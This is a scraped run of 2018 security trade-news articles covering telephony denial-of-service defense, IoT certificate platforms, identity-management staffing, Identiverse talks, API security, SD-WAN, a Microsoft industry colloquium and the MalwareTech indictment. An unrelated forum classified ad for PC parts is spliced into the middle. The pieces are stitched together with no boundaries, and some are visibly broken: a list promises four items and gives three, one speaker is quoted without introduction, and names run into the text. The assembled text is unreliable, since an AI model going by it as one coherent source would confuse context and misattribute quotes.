The U.S. Department of Homeland Security has partnered with security firm SecureLogix to develop technology to defend against telephony denial-of-service attacks, which remain a significant threat to emergency call centers, banks, schools and hospitals.
The DHS Science and Technology (S&T) Directorate said this week the office and SecureLogix were making “rapid progress” in developing defenses against call spoofing and robocalls — two techniques used by criminals in launching telephony denial-of-service (TDoS) attacks to extort money. Ultimately, the S&T’s goal is to “shift the advantage from TDoS attackers to network administrators.”
To that end, S&T and SecureLogix, based in San Antonio, are developing two TDoS attack defenses. First is a mechanism for identifying the voice recording used in call spoofing, followed by a means to separate legitimate emergency calls from robocalls.
“Several corporations, including many banks and DHS components, have expressed interest in this technology, and SecureLogix will release it into the market in the coming months,” William Bryan, interim undersecretary for S&T at DHS, said in a statement.
In 2017, S&T handed SecureLogix a $100,000 research award to develop anticall-spoofing technology. The company was one of a dozen small tech firms that received similar amounts from S&T to create a variety of security applications.
Filtering out TDoS attack calls
SecureLogix’s technology analyzes and assigns a threat score to each incoming call in real time. Calls with a high score are either terminated or redirected to a lower-priority queue or a third-party call management service.
SecureLogix built its prototype on existing voice security technologies, so it can be deployed in complex voice networks, according to S&T. It also contains a business rules management system and a machine learning engine “that can be extended easily, with limited software modifications.”
Over the last year, SecureLogix deployed the prototype within a customer facility, a cloud environment and a service provider network. The vendor also worked with a 911 emergency call center and large financial institutions.
In March 2013, a large-scale TDoS attack highlighted the threat against the telephone systems of public-sector agencies. An alert issued by DHS and the FBI said extortionists had launched dozens of attacks against the administrative telephone lines of air ambulance and ambulance organizations, hospitals and financial institutions.
Today, the need for TDoS protection has grown from on premises to the cloud, where an increasing number of companies and call centers are signing up for unified communications as a service. In 2017, nearly half of organizations surveyed by Nemertes Research were using or planned to use cloud-based UC.
I’m open to offers on all items PRICES NOW INC P&P
Bullguard Internet Security Activation Code £15 £13 Now £10
AMD FX 8320 with cooler asus sabertooth 990fx r2.0 8gb Corsair Dominator RAM £200 £180 £170 £165 £160 £155 NOW inc P&P £155inc open to offers
Watercooling parts All parts are used, have taken out of a working loop.
Black Ice GT Stealth 360 Radiator it has some damage, no leaks or anything that should stop it from working
Details: • High Performance Black Ice GT Stealth 360 Radiator • Two-pass U-flow tank configuration • Custom MaxFin™ 25 micron Copper Splitter Fin Configuration utilizing 45% thinner fin material yielding up to 50% less pressure drop even with twice the fin density. • Yields up to 20% more heat exchange capacity than the Black Ice® Pro in both Stealth or Performance modes. • Achieves Black Ice® Xtreme level performance in stealth mode (low-noise/low-airflow conditions). • Full electrostatic polyurethane painting finish for uniform coating with high temperature curing for increased finish durability. • Dimensions: 397x133x29mm
Toshiba 3TB HDD only used for storage, fully working. £30 Model – toshiba dt01aba300 No longer for sale. 3x noctua nf-p12 fans £6 £5 each sold elsewhere EK-DCP 4.0 PWM (12V DC PWM Pump) foam has been glued on to reduce the noise. £26 £24 £21 Now £16 sold elsewhere
I’m open to offers Prices are without delivery and must be agreed.
Price and currency: £ Delivery: Delivery cost is not included Payment method: BT or Paypal Location: ROTHERHAM Advertised elsewhere?: Advertised elsewhere Prefer goods collected?: I have no preference
______________________________________________________ This message is automatically inserted in all classifieds forum threads. By replying to this thread you agree to abide by the trading rules detailed here. Please be advised, all buyers and sellers should satisfy themselves that the other party is genuine by providing the following via private conversation to each other after negotiations are complete and prior to dispatching goods and making payment:
Landline telephone number. Make a call to check out the area code and number are correct, too
Name and address including postcode
Valid e-mail address
DO NOT proceed with a deal until you are completely satisfied with all details being correct. It’s in your best interest to check out these details yourself.
Rival certificate authorities GlobalSign and Comodo CA this week launched competing IoT security platforms designed to improve identity management and authentication of connected devices.
GlobalSign Tuesday unveiled its IoT Identity Platform, which includes several products and services aimed at using public key infrastructure (PKI) to assign identities to IoT devices and authenticate them. The cloud-based platform includes IoT Edge Enroll, an enrollment client that provisions and manages PKI-based identities for an assortment of connected devices. IoT Edge Enroll can authenticate and revoke devices and also includes a device Registration Authority (RA) as well as certificate lifecycle management.
In addition, GlobalSign’s platform features IoT CA Direct, which is an identity issuance engine for device certificates, and IoT CA Connect, which offers third-party application integration for identity and access management products. GlobalSign said the platform uses RESTful APIs for secure connections and claims its PKI service can issue 3,000 certificates per second.
On Thursday, Comodo CA launched IoT PKI Manager, which also applies certificates to connected devices. Comodo’s IoT security platform, which uses a combination of X.509 identity certificates and customized TLS/SSL certificates, offers enterprises Certificate Authority (CA) signing and hosting services as well as a batch issuance system for enrolling and authenticating large batches of certificates.
Comodo’s IoT security platform also offers automatic certificate provisioning as well as certificate lifecycle management services. The company had previously introduced certificate products and services for IoT devices, but Damon Kachur, head of IoT solutions at Comodo CA, said the IoT PKI Manager ties those offerings together into one platform with a single user interface for all certificates accounts as well as new enrollment and management features. The aim, Kachur said, was to make the certificate process for IoT devices as easy as possible.
“The [IoT] industry is a little scared of PKI because companies think it’s a heavy lift,” he said. “It’s not, if you have the right platform. We take all of the auditing and all of the lifecycle management and make it simple.”
Both Comodo and GlobalSign, as well as other certificate authorities, have discussed the growing opportunities around securing and authenticating connected devices and have already made inroads in the IoT security market. PKI certificates can protect connections and data flows between devices and servers as well as enable organizations to revoke the access of compromised devices to their private networks.
BOSTON — As identity and access management become more critical to security strategies, organizations must be on the lookout for good identity engineers — and there are a few different ways IT can approach this staffing.
Identity and access management (IAM) is increasingly essential as mobile devices add new access points for employees and fresh ways to leak corporate data. But the job market still lacks skilled IAM engineer candidates, so organizations may be better off training existing IT staff or hiring general security engineers to educate on IAM expertise, experts said here at this week’s Identiverse conference.
“Focus on general IT skills and roles [when you] hire engineers,” said Olaf Grewe, director of access certification services at Deutsche Bank, in a session. “Don’t wait for this elusive candidate that has all of this baked in. Bring them up to where you need to be.”
IAM job market landscape
Job growth in IAM has surged in the past year, with about 1,500 IAM engineer openings currently in the Boston area, 4,800 in the D.C. area and 3,320 in Silicon Valley, according to a presentation by Dave Shields, a senior security architect for IAM at DST Systems, a financial technology company in Kansas City.
“It is finally reaching a state where people see that it’s a viable place to have [a career],” said Shields, who was also recently the managing director of IT and ran IAM at the University of Oklahoma. “There are so many things you can do with it.”
There aren’t enough people already skilled in IAM to fill these roles, however, and ones that are may not live nearby. Instead, IT departments can train up existing staff on IAM — but the key is to choose the right people.
“The best engineers you’re going to find are the people who aren’t afraid to break stuff,” Shields said. “Maybe you have a sysadmin who gets into systems and was able to make them do things they were never able to do before. Talk to that person.”
The person should also be flexible, adaptable to change and willing to ask questions others don’t want to hear, he said. Other desirable qualities for an IAM engineer are creativity and an ability to understand the business’ functions and the technology in use.
“Find someone who can look at something and say, ‘I can make that better,'” Shields said. “There are some things that simply cannot be taught.”
IAM and security go hand in hand
Deutsche Bank is currently building up an IAM team that includes existing IT staff and external hires, which the company then trains on IAM skills. That involves four major steps: baseline IAM training, then vendor-specific education, then CISSP, followed by continuous learning over time via conferences, lunch and learns, and updated vendor training.
Olaf Grewedirector of access certification services, Deutsche Bank
“We need to make sure people have access to the right resources,” Grewe said. “We want to have people who are continuously developing.”
General security skills are especially important for IAM engineer candidates, experts said. Sarah Squire, a senior technical architect at Ping Identity, started out by learning the important security specs and standards as a way toward training up on identity management.
“It’s a lot of on-the-job training,” Squire said. “We’re starting to realize that we really need a base body of knowledge for the entire field.”
For that reason, Squire along with Ian Glazer, vice president for identity product management at Salesforce, founded IDPro, a community for IAM professionals. Launched at last year’s Identiverse (then Cloud Identity Summit), IDPro is currently forming the body of knowledge that an IAM engineer must know, and plans to offer a certification in the future, Squire said.
“It’s really important that people who come in not only understand IAM but also really understand security,” Grewe said.
It’s also important to determine where within the organization those IAM professionals will live. Is it operations? Development? Security?
“A lot of people just don’t know where that fits,” Shields said. “There is nowhere better for them to be in my opinion than on the IT security team.”
Grewe’s team at Deutsche Bank, for instance, works under the chief security officer, which has a lot of budget to work with, he said. At IBM, the team that handles internal identity management works closely with HR and other groups that are involved in employees’ access rights, said Heather Hinton, vice president and chief information security officer for IBM Hybrid Cloud.
“[Organizations] need to figure out how to be less siloed,” she said.
BOSTON — Enterprise security teams’ zero-trust mindset is often a good thing. But when it comes to cloud services adoption, Microsoft argued it may be doing more harm than good.
During her session this week at the 2018 Identiverse conference, “The Cake is Not a Lie,” Laura Hunter, principal program manager at Microsoft, said security professionals need to change their default reactions when their organizations want to introduce new cloud applications. She said she finds security professionals go through something similar to the five stages of grief when their organization begins the process of cloud services adoption.
“I put a portion of the blame at the feet of the cloud service provider,” Hunter said regarding why the reactions are so intense. “When [cloud service providers] talk to our customers, we maybe, historically, lay it on a little thick” and promise perfectly secured cloud environments.
The bigger problem, she noted, is security professionals are naturally predisposed to be skeptical of anything “new and shiny,” like the perfectly secured cloud environments.
“It’s in our nature, as security professionals, when we hear the stories of happy, shiny, flowers and goodness, to immediately go ‘shields up,'” she said. “In some ways, this is good. But, in some ways, it can actually work to our detriment.”
According to Hunter, security professionals work in a zero-trust mindset, especially when it comes to cloud services adoption. As a result, when another unit in the organization proposes using a cloud application or service, security professionals have an automatic answer of “no,” because it would be bad for security.
However, if the IT department says no to a service that a business department or employee needs to do their job effectively, that business department or employee will most likely go out and procure the service on their own anyway.
Because of this, Hunter questioned the zero-trust mindset of security professionals.
“Is this default answer of ‘Trust no one’… really acting in our organization’s best interest?” she asked.
Laura Hunterprincipal program manager, Microsoft
By maintaining a “hard-line no” as the default answer every time cloud services adoption is brought up, “we are removing ourselves from the conversation,” Hunter said. “We are removing ourselves from conversations our businesses are having whether we want them to or not.”
When it comes down to business need versus security, business need is always going to win, she said, and then you end up with shadow cloud IT that the security team has no control over.
“It’s going to happen anyway, and the only thing you’ve done by maintaining that hard-line approach is ensure that it happens without you at the table, ensure that it’s happening without you as part of the conversation” about how to monitor the cloud applications, apply controls and policies, and maintain organizational compliance, she said.
“Maintaining that ‘hard-line no’ is actually making your organization less secure,” Hunter said.
Security professionals should instead remain open-minded and “have a conversation that’s a question,” rather than always saying no. The solution is to embrace the use of cloud applications in the enterprise and work to find ways to make them more secure. Better yet, use the cloud services to improve enterprise security.
“Let’s use the cloud for the good of our organization.”
BOSTON — Ping Identity is moving beyond single sign-on and further into API security with its latest acquisition.
At the Identiverse 2018 conference on Tuesday, the Denver-based identity and access management (IAM) provider announced the acquisition of Elastic Beam, a Redwood City, Calif., cybersecurity startup that uses artificial intelligence to monitor and protect APIs. Terms of the deal were not disclosed.
Elastic Beam, which was founded in 2014, will become part of Ping’s new API protection offering, dubbed PingIntelligence for APIs. Elastic Beam’s API Behavioral Security (ABS) automatically discovers an organization’s APIs and monitors the activity using AI-driven behavioral analysis.
“The moment it detects abnormal activity on an API, it automatically blocks that API,” said Bernard Harguindeguy, founder of Elastic Beam.
Harguindeguy, who joined Ping as its new senior vice president of intelligence, said ABS’ use of AI is ideal for API monitoring and defense, because there are simply too many APIs and too much data around them for human security professionals to effectively track and analyze on their own.
“API security is a very hard problem. You cannot rely on roles and policies and attacker patterns,” he said. “We had to use AI in a very smart way.”
Durand said the explosion of APIs in both cloud services and mobile applications has expanded the attack surface for enterprises and demanded a new approach to managing and securing APIs. While Durand acknowledged the potential for AI systems to make mistakes, he said improving API protection can’t be done without the help of machine learning and AI technology.
“We’re in the early stages of applying AI to the enormity of traffic that we have access to today,” he said. “We want to limit the space and time that users have access to, but there’s no policy that can do that. I don’t think there’s a way to have that breakthrough without machine learning, big data and AI.”
PingIntelligence for APIs is currently in private preview, and it will be generally available in the third quarter this year.
Silver Peak boosted its software-defined WAN security for cloud-based workloads with the introduction of three security partners.
Silver Peak Unity EdgeConnect customers can now add security capabilities from Forcepoint, McAfee and Symantec for layered security in their Silver Peak SD-WAN infrastructure, the vendor said in a statement. The three security newcomers join existing Silver Peak partners Check Point, Fortinet, OPAQ Networks, Palo Alto Networks and Zscaler.
Silver Peak SD-WAN allows customers to filter application traffic that travels to and from cloud-based workloads through security processes from third-party security partners. Customers can insert virtual network functions (VNFs) through service chaining wherever they need the capabilities, which can include traffic inspection and verification, distributed denial-of-service protection and next-generation firewalls.
These partnership additions build on Silver Peak’s recent update to incorporate a drag-and-drop interface for service chaining and enhanced segmentation capabilities. For example, Silver Peak said a typical process starts with customers defining templates for security policies that specify segments for users and applications. This segmentation can be created based on users, applications or WAN services — all within Silver Peak SD-WAN’s Unity Orchestrator.
Once the template is complete, Silver Peak SD-WAN launches and applies the security policies for those segments. These policies can include configurations for traffic steering, so specific traffic automatically travels through certain security VNFs, for example. Additionally, Silver Peak said customers can create failover procedures and policies for user access.
Enterprises are increasingly moving their workloads to public cloud and SaaS environments, such as Salesforce or Microsoft Office 365. Securing that traffic — especially traffic that travels directly over broadband internet connections — remains top of mind for IT teams, however. By service chaining security functions from third-party security companies, Silver Peak SD-WAN customers can access those applications more securely, the company said.
Silver Peak SD-WAN holds 12% of the $162 million SD-WAN market, according to a recent IHS Markit report, which ranks the vendor third after VMware-VeloCloud and Aryaka.
ONF pinpoints four technology areas to develop
The Open Networking Foundation unveiled four new supply chain partners that are working to develop technology reference designs based on ONF’s strategic plan. Along with the four partners — Adtran, Dell EMC, Edgecore Networks and Juniper Networks — ONF finalized the focus areas for the initial reference designs.
ONF’s reference designs provide blueprints to follow while building open source platforms that use multiple components, the foundation said in a statement. While the broad focus for these blueprints looks at edge cloud, ONF targeted four specific technology areas:
Network functions virtualization fabric. This blueprint develops work on leaf-spine data center fabric for edge applications.
Unified programmable and automated network. ONF touts this as a next-generation SDN reference design that uses the P4 language for data plane programmability.
Open disaggregated transport network. This reference design focuses on open multivendor optical networks.
Adtran, Dell EMC, EdgeCore and Juniper each apply its own technology expertise to these reference design projects, ONF said. Additionally, as supply chain partners, they’ll aid operators in assembling deployment environments based on the reference designs.
REDMOND, Wash. — At first glance, the gathering inside Building 99 at Microsoft this week looked like many others inside the company, as technical experts shared hard-earned lessons for using machine learning to defend against hackers.
It looked normal, that is, until you spotted the person in the blue Google shirt addressing the group, next to speakers from Salesforce, Netflix and Microsoft, at a day-long event that included representatives of Facebook, Amazon and other big cloud providers and services that would normally treat technical insights as closely guarded secrets.
As the afternoon session ended, the organizer from Microsoft, security data wrangler Ram Shankar Siva Kumar, complimented panelist Erik Bloch, the Salesforce security products and program management director, for “really channeling the Ohana spirit,” referencing the Hawaiian word for “family,” which Salesforce uses to describe its internal culture of looking out for one another.
Siva Kumar then gave attendees advice on finding the location of the closing reception. “You can Bing it, Google it, whatever it is,” he said, as the audience laughed at the rare concession to Microsoft’s longtime competitor.
It was no ordinary gathering at Microsoft, but then again, it’s no ordinary time in tech. The Security Data Science Colloquium brought the competitors together to focus on one of the biggest challenges and opportunities in the industry.
Machine learning, one of the key ingredients of artificial intelligence, is giving the companies new superpowers to identify and guard against malicious attacks on their increasingly cloud-oriented products and services. The problem is that hackers are using many of the same techniques to take those attacks to a new level.
“The challenge is that security is a very asymmetric game,” said Dawn Song, a UC Berkeley computer science and engineering professor who attended the event. “Defenders have to defend across the board, and attackers only need to find one hole. So in general, it’s easier for attackers to leverage these new techniques.”
That helps to explain why the competitors are teaming up.
“At this point in the development of this technology it’s really critical for us to move at speed to all collaborate,” explained Mark Russinovich, the Microsoft Azure chief technology officer. “A customer of Google is also likely a customer of Microsoft, and it does nobody any good or gives anybody a competitive disadvantage to keep somebody else’s customer, which could be our own customer, insecure. This is for the betterment of everybody, the whole community.”
This spirit of collaboration is naturally more common in the security community than in the business world, but the colloquium at Microsoft has taken it to another level. GeekWire is the first media organization to go inside the event, although some presentations weren’t opened up to us, due in part to the sensitive nature of some of the information the companies shared.
The event, in its second year, grew out of informal gatherings between Microsoft and Google, which resulted in part from connections Siva Kumar made on long-distance runs with Google’s tech security experts. After getting approval from his manager, he brought one of the Google engineers to Microsoft two years ago to compare notes with his team.
Things have snowballed from there. After the first event, last year, Siva Kumar posted about the colloquium, describing it as a gathering of “security data scientists without borders.” As the word got out, additional companies asked to be involved, and Microsoft says this year’s event was attended by representatives of 17 different tech companies in addition to university researchers.
The event reflects a change in Microsoft’s culture under CEO Satya Nadella, as well as a shift in the overall industry’s approach. Of course, the companies are still business rivals that compete on the basis of beating each other’s products. But in years or decades past, many treated security as a competitive advantage, as well. That’s what has changed.
“This is not a competing thing. This is not about us trying to one up each other,” Siva Kumar said. “It just feels like, year over year, our problems are just becoming more and more similar.”
In one afternoon session this week, representatives from Netflix, one of Amazon Web Services’ marquee customers, gave detailed briefings on the streaming service’s internal machine learning tools, including its “Trainman” system for detecting and reporting unusual user activity.
Developing and improving the system has been a “humbling journey,” said Siamac Mirzaie from the Netflix Science & Analytics Team, before doing a deep dive on the technical aspects of Trainman.
Depending on the situation, he said, Netflix uses either Python, Apache Spark or Flink to bring the data into its system and append the necessary attributes to the data. It then uses simple rules, statistical models and machine learning models to detect anomalies using Flink or Spark, followed by a post-processing layer that uses a combination of Spark and Node.js. That’s followed by a program for visualizing the anomalies in a timeline that people inside the company can use to drill down into and understand specific events.
“The idea is to refine the various data anomalies that we’ve generated in the previous stage into anomalies that our application owner or security analyst can actually relate to,” Mirzaie said.
The stakes are high given the $8 billion that Netflix is expected to spend on content this year.
But the stakes might be even higher for Facebook. The social network, which has been in the international spotlight over misuse of its platform by outside companies and groups, says it uses a combination of automated and manual systems to identify fraudulent and suspicious activity.
During his keynote, Microsoft’s Russinovich talked in detail about Windows PowerShell, the command-line program that is a popular tool for attackers in part because it’s built into the system. Microsoft’s Windows Defender Advanced Threat Protection is designed to detect suspicious command lines, and Microsoft was previously using a traditional model that was trained to recognize potentially malicious sequences of characters.
“That only got us so far,” Russinovich said in an interview.
After brainstorming ways to solve the problem, the company’s security defense researchers figured out how to apply deep neural networks, more commonly used in vision-based object detection, for use in PowerShell malicious script detection, as well. They essentially came up with a way to encode command lines to make them look like images to the machine learning model, Russinovich explained. The result surpassed the traditional technique “by a significant amount,” he said.
At the closing panel discussion, David Seidman, Google security engineering manager, summed up the stated philosophy of the event. “We are not trying to compete on the basis of our corporate security,” Seidman said. “Google is not trying to get ahead of Microsoft in the cloud because Microsoft got compromised. That’s the last thing we want to see.”
“We are fighting common enemies,” Seidman added. “The same attackers are coming after all of us, and an incident at one company is going to affect that customer’s trust in all the cloud companies they do business with. So we have very much aligned interests here.”
Cloud security isn’t for the squeamish. Protecting cloud-based workloads and designing a hybrid cloud security architecture has become a more difficult challenge than first envisioned, said Jon Oltsik, an analyst at Enterprise Strategy Group in Milford, Mass.
“The goal was simple,” he said. Enterprises wanted the same security they had for their internal workloads to be extended to the cloud.
But using existing security apps didn’t work out so well. In response, enterprises tried to concoct their own, but that meant the majority of companies had separate security foundations for their on-premises and cloud workloads, Oltsik said.
The answer in creating a robust hybrid cloud security architecture is central policy management, where all workloads are tracked, policies and rules applied and networking components displayed in a centralized console. Firewall and security vendors are beginning to roll out products supporting this strategy, Oltsik said, but it’s still incumbent upon CISOs to proceed carefully.
“The move to central network security policy management is a virtual certainty, but which vendors win or lose in this transition remains to be seen.”
Dennis Drogseth, an analyst at Enterprise Management Associates in Boulder, Colo., described the metamorphosis of UEM, debunking the notion that the methodology is merely a subset of application performance management.
Instead, Drogseth said, UEM is multifaceted, encompassing application performance, business impact, change management, design, user productivity and service usage.
According to EMA research, over the last three years the two most important areas for UEM is application performance and portfolio planning and optimization. Valuable insights can be provided by UEM to assist both IT and business.
One question surrounding UEM is whether it falls into the realm of IT or business. In years past EMA data suggested 20% of networking staffers considered UEM a business concern, 21% an IT concern and 59% said UEM should be equally an IT and business concern. Drogseth agreed wholeheartedly with the latter group.
Drogseth expanded on the usefulness of UEM in his blog, including how UEM is important to DevOps and creating an integrated business strategy.
Mixed LPWAN results, but future could be bright
GlobalData analyst Kitty Weldon examined the evolving low-power WAN market in the wake of the 2018 annual conference in London.
Mobile operators built out their networks for LPWAN in 2017, Weldon said, and are now starting to look for action. Essentially every internet of things (IoT) service hopped on the LPWAN bandwagon; now they await the results.
So far, there have been 48 launches by 26 operators.
The current expectation remains lowered costs and improved battery life will eventually usher in thousands of new low-bandwidth IoT devices connecting to LPWANs. However, Weldon notes that it’s still the beginning of the LPWAN era, and right now feelings are mixed.
“Clearly, there is some concern in the industry that the anticipated massive uptake of LPWANs will not be realized as easily as they had hoped, but the rollouts continue and optimism remains, tempered with realistic concerns about how best to monetize the investments.”
The court saga of Marcus Hutchins, a security researcher from England also known as MalwareTech, will continue after a superseding indictment filed by the U.S. government added new charges to his case.
Hutchins was originally arrested in August 2017 on charges of creating and distributing the Kronos banking Trojan. The superseding MalwareTech indictment, filed on Wednesday, adds four new charges to the original six, including the creation of the UPAS kit malware, conspiracy to commit wire fraud, and lying to the FBI.
Hutchins first gained prominence in May 2017 for being one of the researchers who helped slow the spread of the WannaCry ransomware, and he recently mused on Twitter at the connection between that act and the new MalwareTech indictment.
While this all sucks a lot, I can’t stop laughing at the irony of the superseding indictment coming exactly on the 1 year anniversary of me receiving an award for stopping WannaCry.
Hutchins also had strong language to describe the supplemental indictment, but one of his lawyers, Brian Klein was more measured.
@marciahofmann and I are disappointed the govt has filed this superseding indictment, which is meritless. It only serves to highlight the prosecution’s serious flaws. We expect @MalwareTechBlog to be vindicated and then he can return to keeping us all safe from malicious software https://t.co/E1M0qod3CN
The UPAS Kit described in the new filing was a form grabber that Hutchins admitted to creating, but he asserted it was not connected to Kronos. Marcy Wheeler, national security and civil liberties expert, questioned how this was included in the new MalwareTech indictment because of the time frames related to those charges.
The indictment noted that the UPAS Kit was originally sold and distributed in July 2012 and it alleged Hutchins developed Kronos “prior to 2014” and supplied it to the individual who sold the UPAS Kit. However, Wheeler pointed out in a blog post that there should be a five year statute of limitations related to such charges and even if the government could avoid that, Hutchins would have been a minor in 2012 when these actions allegedly took place.
Additionally, Wheeler noted that Hutchins admitted to creating the UPAS form grabber — although he denied it was part of Kronos — when he was first arrested by the FBI. The new MalwareTech indictment claims Hutchins lied to the FBI about creating Kronos which would put into question the new charge that Hutchins lied to the FBI.